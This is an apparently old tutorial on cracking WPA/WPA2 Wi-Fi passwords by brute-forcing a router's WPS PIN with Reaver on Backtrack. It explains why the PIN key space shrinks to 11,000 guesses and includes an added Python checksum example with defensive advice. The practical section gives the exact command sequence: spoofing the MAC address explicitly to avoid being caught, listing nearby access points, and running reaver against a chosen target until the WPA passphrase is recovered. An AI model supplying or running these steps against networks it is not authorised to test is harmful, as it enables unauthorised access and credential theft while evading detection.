Cracking Wi-Fi Passwords using Backtrack
A WPA/WPA2 password can be cracked simply by capturing the WPA handshake and
then applying a dictionary attack to it. If the passphrase is in the
dictionary the password will be cracked, but this process may take
hours, and in some cases even days. But what if the password is not in the
dictionary?
So here we will learn to crack these passphrases.
WPS: Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless
home network. By default it is enabled on most routers.
Using Reaver we will brute force the AP's WPS, attempting every possible combination in order to guess the AP's 8-digit PIN number. Since the PIN
is all numeric, there are 10^8 (100,000,000) possible values for any given PIN. However, because the last digit of the PIN is a checksum value which
can be calculated from the previous 7 digits, the key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further because the WPS authentication protocol cuts the PIN in half and validates each half individually.
Reaver brute forces the first half of the PIN and then the second half, meaning that the entire key space for the WPS PIN can be exhausted in
11,000 attempts. So the key concept here is that we can brute force that PIN, and thereby obtain the credentials kept by the Access Point, which can be any combination of
digits and special symbols.
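As an added example (not code from the original post or from Reaver), here is the PIN checksum rule the text refers to, the one a WPS registrar uses to validate a PIN, together with the three guess counts the text gives; the function names are our own:

```python
# Added example: why a WPS PIN key space collapses from 10^8 to 11,000 guesses.
# The checksum rule is the one in the Wi-Fi Alliance WPS specification
# (what a router checks when a PIN is entered); function names are ours.

def wps_checksum(first7: int) -> int:
    """Return the 8th (check) digit for a 7-digit WPS PIN prefix."""
    if not 0 <= first7 <= 9_999_999:
        raise ValueError("expected a 7-digit PIN prefix")
    accum = 0
    pin = first7
    while pin:                      # digit weights alternate 3,1,3,1,... from the right
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries the correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(int(pin[:7]))


def wps_keyspace() -> dict:
    """Guess counts for the three key-space views discussed in the text."""
    all_pins = 10 ** 8            # any 8 digits
    checksum_valid = 10 ** 7      # last digit is fixed by the first seven
    # The AP confirms or rejects the first 4 digits before the second half is
    # ever examined, so the halves are guessed independently: 10^4 for the
    # first half, then 10^3 for the second (its last digit is the checksum).
    split_halves = 10 ** 4 + 10 ** 3
    return {"all": all_pins, "checksum_valid": checksum_valid,
            "split_halves": split_halves}


if __name__ == "__main__":
    # 12345670 is the sample PIN used in hostapd's example configuration.
    print(is_valid_wps_pin("12345670"), is_valid_wps_pin("12345678"))
    print(wps_keyspace())
```

A PIN that validates here is merely well-formed, not secret; the defender's takeaway is that the half-by-half validation, not the checksum, is what makes the PIN guessable, so WPS PIN mode should be disabled on any AP you are responsible for.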
Let's start:
Boot your Backtrack.
First we will change the MAC address of our network card so that we won't get caught:
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Now run the following command to list all the available APs:
wash -i mon0
Now choose your target, note its BSSID, and issue the following command, replacing <bssid> with the target's BSSID:
reaver -i mon0 -b <bssid> -vv
Now wait until Reaver brute forces the PIN. Once it's done, you'll have:
WPS Pin
WPA PSK
AP SSID